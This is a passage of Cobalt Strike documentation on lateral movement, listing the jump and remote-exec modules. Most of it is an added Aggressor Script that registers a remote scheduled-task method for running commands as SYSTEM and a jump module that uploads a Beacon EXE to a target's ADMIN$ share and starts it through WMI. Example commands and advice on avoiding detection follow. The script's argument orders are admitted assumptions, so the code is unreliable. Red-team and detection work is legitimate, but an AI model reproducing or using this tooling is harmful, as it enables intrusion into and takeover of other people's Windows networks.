Lateral Movement
Once you have a token for a domain admin or a domain user who is a local admin on a target, you may abuse this trust relationship to get control of the target. Cobalt Strike’s Beacon has several built-in options for lateral movement.
Type `jump` to list the lateral movement options registered with Cobalt Strike. Run `jump [module] [target] [listener]` to attempt to run a payload for the given listener on a remote target.
Jump Module | Arch | Description |
---|---|---|
psexec | x86 | Use a service to run a Service EXE artifact |
psexec64 | x64 | Use a service to run a Service EXE artifact |
psexec_psh | x86 | Use a service to run a PowerShell one-liner |
winrm | x86 | Run a PowerShell script via WinRM |
winrm64 | x64 | Run a PowerShell script via WinRM |
Run `remote-exec`, by itself, to list the remote execution modules registered with Cobalt Strike. Use `remote-exec [module] [target] [command + args]` to attempt to run the specified command on a remote target.
Remote-exec Module | Description |
---|---|
psexec | Remote execute via Service Control Manager |
winrm | Remote execute via WinRM (PowerShell) |
wmi | Remote execute via WMI |
Lateral movement is an area, similar to privilege escalation, where some attacks naturally yield a session on the remote target (they deliver and start a payload in one step), while others yield only an execute primitive: the ability to run a command on the target, with no payload delivery built in. The split between jump and remote-exec gives you the flexibility to decide how to weaponize an execute-only primitive, for example by staging a payload on the target first (with upload, or with a PowerShell one-liner that fetches it) and then starting it with remote-exec.
Aggressor Script has an API to add new modules to jump and remote-exec. See the Aggressor Script documentation (the Beacon chapter, specifically) for more information.
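The following Aggressor Script is an added example, not code from the Cobalt Strike documentation or product. It shows both halves of the split described above from the extension side: a new execute-only remote-exec method (a remote scheduled task, MITRE T1053.005) and a new jump module that weaponizes an execute primitive by uploading an EXE artifact to the target's ADMIN$ share and then starting it with the built-in wmi remote-exec module. The function names (btask, bshell, bupload_raw, bremote_exec, artifact_general, beacon_remote_exec_method_register, beacon_remote_exploit_register) are the ones given in the Aggressor Script Beacon chapter, but their exact argument orders, the acceptance of a UNC path by bupload_raw, and the module names schtask and wmi_exe are assumptions to check against the documentation for your Cobalt Strike version.

```aggressor
# Added example (not Cobalt Strike's own code). Function names follow the
# Aggressor Script Beacon chapter; argument orders are assumptions, verify
# them against the docs for your version before relying on this script.

# --- 1. execute-only primitive: remote scheduled task --------------------
# Runs $command on $target as SYSTEM through the Task Scheduler RPC
# interface, using the current Beacon's token.
# Callback arguments: $1 = beacon ID, $2 = target, $3 = command.
sub schtask_execute {
    local('$bid $target $command $task');
    ($bid, $target, $command) = @_;
    $task = "Update" . rand(100000);   # random task name so reruns do not collide

    btask($bid, "Tasked beacon to run '" . $command . "' on " . $target .
                " via a scheduled task", "T1053");

    # single-quoted Sleep strings do no escape processing, so backslashes
    # and $ stay literal; create the one-shot task and fire it immediately
    bshell($bid, 'schtasks /S ' . $target . ' /Create /TN ' . $task .
                 ' /TR "' . $command . '" /SC ONCE /ST 00:00 /RU SYSTEM /F' .
                 ' && schtasks /S ' . $target . ' /Run /TN ' . $task);

    # cleanup: the task stays registered on the target until it is removed
    bshell($bid, 'schtasks /S ' . $target . ' /Delete /TN ' . $task . ' /F');
}

# --- 2. jump module: execute primitive + payload delivery = session ------
# Callback arguments: $1 = beacon ID, $2 = target, $3 = listener.
sub jump_wmi_exe {
    local('$bid $target $listener $name $artifact $dest');
    ($bid, $target, $listener) = @_;
    $name = "svc" . rand(100000) . ".exe";

    # build an x64 Beacon EXE for the chosen listener; a plain exe, not a
    # Service EXE, because WMI starts it as an ordinary process
    $artifact = artifact_general($listener, "exe", "x64");

    # stage it over SMB into the target's ADMIN$ share (= %SystemRoot%);
    # assumption: bupload_raw accepts a UNC destination
    $dest = '\\' . $target . '\ADMIN$\' . $name;
    btask($bid, "Tasked beacon to run an EXE artifact on " . $target . " via WMI", "T1047");
    bupload_raw($bid, $dest, $artifact);

    # hand off to an execute-only primitive: the built-in wmi module here,
    # but the "schtask" method registered below would work in its place
    bremote_exec($bid, "wmi", $target, 'C:\Windows\' . $name);
}

# register both so they appear in remote-exec and jump listings
beacon_remote_exec_method_register("schtask", "Remote execute via scheduled task", &schtask_execute);
beacon_remote_exploit_register("wmi_exe", "x64", "Upload an EXE artifact to ADMIN$ and start it via WMI", &jump_wmi_exe);
```

After loading the script, `remote-exec` lists schtask and `jump` lists wmi_exe, so a Beacon with a suitable token can run `remote-exec schtask FILESRV01 whoami /all` or `jump wmi_exe FILESRV01 http-x64` (hypothetical host and listener names). Two caveats a practitioner will care about: the EXE stays on disk in ADMIN$ after the new session calls back and should be removed once it is no longer needed, and every step here (SMB write to an administrative share, WMI process creation, remote task registration) is a well-known detection point, so pick the primitive that best fits the target's telemetry rather than the first one that works.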